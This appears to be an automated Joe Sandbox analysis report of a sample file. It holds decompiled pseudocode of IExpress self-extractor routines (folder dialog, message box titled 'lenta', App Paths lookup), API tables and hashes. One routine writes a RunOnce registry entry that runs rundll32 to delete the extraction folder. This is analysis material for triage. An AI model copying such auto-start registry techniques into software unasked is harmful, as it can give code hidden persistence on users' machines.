                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E003D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0x3d88c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0x3d87a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0x3d8598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E003D4200;
                                                                        					_v28 = 0x3d88c0;
                                                                        					 *0x3da288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0x3da288(_t32, 0x3d88c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0x3d88c0 != 0) {
                                                                        							E003D1680(0x3d87a0, 0x104, 0x3d88c0);
                                                                        						}
                                                                        						 *0x3da288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0x3d87a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0x3d88c0);
                                                                        					_t61 = 0x3d88c0;
                                                                        					_t4 =  &(_t61[1]); // 0x3d88c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0x3d88c0; // 0x7b1181
                                                                        					_t44 = CharPrevA(0x3d88c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0x3d88c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}




























                                                                        0x003d4234
                                                                        0x003d423c
                                                                        0x003d4240
                                                                        0x003d43b2
                                                                        0x003d43b7
                                                                        0x003d43c0
                                                                        0x00000000
                                                                        0x003d43c5
                                                                        0x003d424c
                                                                        0x003d4252
                                                                        0x003d4257
                                                                        0x003d43a4
                                                                        0x003d43a5
                                                                        0x003d43ab
                                                                        0x00000000
                                                                        0x003d43ab
                                                                        0x003d4263
                                                                        0x003d4269
                                                                        0x003d426e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d427a
                                                                        0x003d4280
                                                                        0x003d4285
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d428d
                                                                        0x003d4293
                                                                        0x003d42e6
                                                                        0x003d42e9
                                                                        0x003d42ef
                                                                        0x003d42f4
                                                                        0x003d42f7
                                                                        0x003d4300
                                                                        0x003d4307
                                                                        0x003d430e
                                                                        0x003d4315
                                                                        0x003d431c
                                                                        0x003d4322
                                                                        0x003d4326
                                                                        0x003d432d
                                                                        0x003d432d
                                                                        0x003d432f
                                                                        0x003d4334
                                                                        0x003d4343
                                                                        0x003d4349
                                                                        0x003d434d
                                                                        0x003d4354
                                                                        0x003d4354
                                                                        0x003d435d
                                                                        0x003d436e
                                                                        0x003d436e
                                                                        0x003d437d
                                                                        0x003d4383
                                                                        0x003d4387
                                                                        0x003d438e
                                                                        0x003d438e
                                                                        0x003d4387
                                                                        0x003d4391
                                                                        0x003d4399
                                                                        0x00000000
                                                                        0x003d4295
                                                                        0x003d429f
                                                                        0x003d42a5
                                                                        0x003d42aa
                                                                        0x003d42aa
                                                                        0x003d42ad
                                                                        0x003d42ad
                                                                        0x003d42af
                                                                        0x003d42b0
                                                                        0x003d42b6
                                                                        0x003d42c2
                                                                        0x003d42c8
                                                                        0x003d42ce
                                                                        0x003d42e4
                                                                        0x003d42e4
                                                                        0x00000000
                                                                        0x003d42ce

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 003D4236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 003D424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 003D4263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 003D427A
                                                                        • GetTempPathA.KERNEL32(00000104,003D88C0,?,00000001), ref: 003D429F
                                                                        • CharPrevA.USER32(003D88C0,007B1181,?,00000001), ref: 003D42C2
                                                                        • CharPrevA.USER32(003D88C0,00000000,?,00000001), ref: 003D42D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003D4391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003D43A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 23efcdcf88b83e0904a6ca27401bd9669fc86b64e3cd33e411d39197f545d299
                                                                        • Instruction ID: 2ce8ab5fe1b8a5c663468908cf23578ed7a39495bd1ffb72f46aa81629a44e12
                                                                        • Opcode Fuzzy Hash: 23efcdcf88b83e0904a6ca27401bd9669fc86b64e3cd33e411d39197f545d299
                                                                        • Instruction Fuzzy Hash: 744123BAA01240AFD713AF74FC88AAE7BB8EB49344F05046BF901A3391CB749C01C761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0x3d8a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0x3d9a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E003D1680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E003D171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E003D171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E003D681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E003D67C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E003D681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E003D67C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}



































                                                                        0x003d44b9
                                                                        0x003d44c4
                                                                        0x003d44cb
                                                                        0x003d44d8
                                                                        0x003d44e4
                                                                        0x003d44eb
                                                                        0x003d44ee
                                                                        0x003d44ef
                                                                        0x003d44ef
                                                                        0x003d44f1
                                                                        0x003d44f7
                                                                        0x003d44f8
                                                                        0x003d467b
                                                                        0x003d44fe
                                                                        0x003d4509
                                                                        0x003d4518
                                                                        0x003d4525
                                                                        0x003d4562
                                                                        0x003d4568
                                                                        0x003d4568
                                                                        0x003d456b
                                                                        0x003d456b
                                                                        0x003d456d
                                                                        0x003d456e
                                                                        0x003d4572
                                                                        0x003d4578
                                                                        0x003d457c
                                                                        0x003d45cb
                                                                        0x003d4607
                                                                        0x003d4607
                                                                        0x003d460d
                                                                        0x003d4613
                                                                        0x003d4617
                                                                        0x00000000
                                                                        0x003d461d
                                                                        0x003d4623
                                                                        0x003d4626
                                                                        0x003d4628
                                                                        0x00000000
                                                                        0x003d4628
                                                                        0x003d45cd
                                                                        0x003d45cd
                                                                        0x003d45cf
                                                                        0x003d45cf
                                                                        0x003d45d2
                                                                        0x003d45d2
                                                                        0x003d45d4
                                                                        0x003d45d5
                                                                        0x003d45db
                                                                        0x003d45de
                                                                        0x003d45e3
                                                                        0x003d45e9
                                                                        0x003d45ed
                                                                        0x00000000
                                                                        0x003d45f3
                                                                        0x003d45fd
                                                                        0x00000000
                                                                        0x003d4602
                                                                        0x003d45ed
                                                                        0x003d457e
                                                                        0x003d457e
                                                                        0x003d4580
                                                                        0x003d4580
                                                                        0x003d4583
                                                                        0x003d4583
                                                                        0x003d4585
                                                                        0x003d4586
                                                                        0x003d458a
                                                                        0x003d458c
                                                                        0x003d458f
                                                                        0x003d458f
                                                                        0x003d4591
                                                                        0x003d4592
                                                                        0x003d459b
                                                                        0x003d459e
                                                                        0x003d45a3
                                                                        0x003d45a9
                                                                        0x003d45ad
                                                                        0x00000000
                                                                        0x003d45af
                                                                        0x003d45af
                                                                        0x003d45bf
                                                                        0x003d462d
                                                                        0x003d4630
                                                                        0x003d463d
                                                                        0x003d464e
                                                                        0x003d464e
                                                                        0x003d463f
                                                                        0x003d4640
                                                                        0x003d4647
                                                                        0x003d464c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d464c
                                                                        0x003d4666
                                                                        0x003d466d
                                                                        0x003d466f
                                                                        0x003d4675
                                                                        0x003d4675
                                                                        0x003d45ad
                                                                        0x003d4527
                                                                        0x003d452e
                                                                        0x003d453f
                                                                        0x003d453f
                                                                        0x003d4530
                                                                        0x003d4531
                                                                        0x003d4538
                                                                        0x003d453d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d453d
                                                                        0x003d4554
                                                                        0x003d455a
                                                                        0x003d455a
                                                                        0x003d455a
                                                                        0x003d4525
                                                                        0x003d468c

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                        • MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 003D45A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 003D45E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 003D460D
                                                                        • MessageBeep.USER32(00000000), ref: 003D4630
                                                                        • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 003D4666
                                                                        • LocalFree.KERNEL32(00000000), ref: 003D466F
                                                                          • Part of subcall function 003D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003D686E
                                                                          • Part of subcall function 003D681F: GetSystemMetrics.USER32(0000004A), ref: 003D68A7
                                                                          • Part of subcall function 003D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003D68CC
                                                                          • Part of subcall function 003D681F: RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,?,0000000C), ref: 003D68F4
                                                                          • Part of subcall function 003D681F: RegCloseKey.ADVAPI32(?), ref: 003D6902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                        • API String ID: 3244514340-1000497449
                                                                        • Opcode ID: ac47aef7205366a8e48f69486f08c656c63a9967753a3ab2aea418c0cc9a481f
                                                                        • Instruction ID: 67ddba45d963f3427e20152441e7f7576a06100a3c98b539e1f8aea6f374085d
                                                                        • Opcode Fuzzy Hash: ac47aef7205366a8e48f69486f08c656c63a9967753a3ab2aea418c0cc9a481f
                                                                        • Instruction Fuzzy Hash: 7351D073901219ABDB239F28FD48BAA7B69EF46300F014196FD19A7341DB31DE098B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D2773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E003D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E003D658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E003D658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0x3d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E003D1680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}























                                                                        0x003d2773
                                                                        0x003d277e
                                                                        0x003d2785
                                                                        0x003d278a
                                                                        0x003d278d
                                                                        0x003d2790
                                                                        0x003d2792
                                                                        0x003d2798
                                                                        0x003d279d
                                                                        0x003d28b2
                                                                        0x00000000
                                                                        0x003d27a3
                                                                        0x003d27a3
                                                                        0x003d27af
                                                                        0x003d27c2
                                                                        0x003d27c8
                                                                        0x003d27cd
                                                                        0x003d27d5
                                                                        0x003d28b7
                                                                        0x003d28b9
                                                                        0x00000000
                                                                        0x003d27db
                                                                        0x003d27dd
                                                                        0x003d28aa
                                                                        0x00000000
                                                                        0x003d27e3
                                                                        0x003d27e3
                                                                        0x003d27ec
                                                                        0x003d27f8
                                                                        0x003d2803
                                                                        0x003d280b
                                                                        0x003d2831
                                                                        0x003d28c3
                                                                        0x003d28c9
                                                                        0x003d28cd
                                                                        0x003d2837
                                                                        0x003d285a
                                                                        0x003d285c
                                                                        0x003d2865
                                                                        0x003d2892
                                                                        0x003d2895
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2867
                                                                        0x003d2878
                                                                        0x003d288c
                                                                        0x00000000
                                                                        0x003d287a
                                                                        0x003d2880
                                                                        0x003d2885
                                                                        0x003d2897
                                                                        0x003d2899
                                                                        0x003d2899
                                                                        0x003d2878
                                                                        0x003d2865
                                                                        0x003d28a0
                                                                        0x003d28bf
                                                                        0x003d28c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d28c1
                                                                        0x003d2831
                                                                        0x003d27dd
                                                                        0x003d27d5
                                                                        0x003d28e5

                                                                        APIs
                                                                        • CharUpperA.USER32(F4FC83B5,00000000,00000000,00000000), ref: 003D27A8
                                                                        • CharNextA.USER32(0000054D), ref: 003D27B5
                                                                        • CharNextA.USER32(00000000), ref: 003D27BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2829
                                                                        • RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D2870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003D28A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003D28AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D28B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003D27E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: 1fb932c5708d389cb9eac9e054d7a1e3a7e460b3e4c14c19521174fd48d965da
                                                                        • Instruction ID: 7d3a75b57a0dbffbba9bde8daacdaf44b43b7297c5fe4202e7e16d8ec0e4c2f5
                                                                        • Opcode Fuzzy Hash: 1fb932c5708d389cb9eac9e054d7a1e3a7e460b3e4c14c19521174fd48d965da
                                                                        • Instruction Fuzzy Hash: 4B4184B290012CAFDB269B64FC45AEA77BDEB65700F0040A7F545D2210DB708E859FA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E003D2267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0x3d8530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E003D658A( &_v268, 0x104, 0x3d1140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E003D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E003D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}



















                                                                        0x003d2272
                                                                        0x003d2277
                                                                        0x003d2279
                                                                        0x003d2283
                                                                        0x003d2289
                                                                        0x003d22ab
                                                                        0x003d22b1
                                                                        0x003d22c4
                                                                        0x003d22e0
                                                                        0x003d22e6
                                                                        0x003d22f5
                                                                        0x003d230d
                                                                        0x003d231c
                                                                        0x003d231c
                                                                        0x003d2321
                                                                        0x003d233a
                                                                        0x003d2342
                                                                        0x003d2348
                                                                        0x003d234b
                                                                        0x003d234c
                                                                        0x003d234c
                                                                        0x003d234e
                                                                        0x003d234f
                                                                        0x003d236e
                                                                        0x003d236e
                                                                        0x003d237a
                                                                        0x003d2380
                                                                        0x003d2380
                                                                        0x003d2381
                                                                        0x003d2381
                                                                        0x003d238f

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003D22A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 003D22D8
                                                                        • memset.MSVCRT ref: 003D22F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D2305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 003D236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 003D237A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D2321
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 003D2299
                                                                        • wextract_cleanup0, xrefs: 003D227C, 003D22CD, 003D2363
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003D232D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
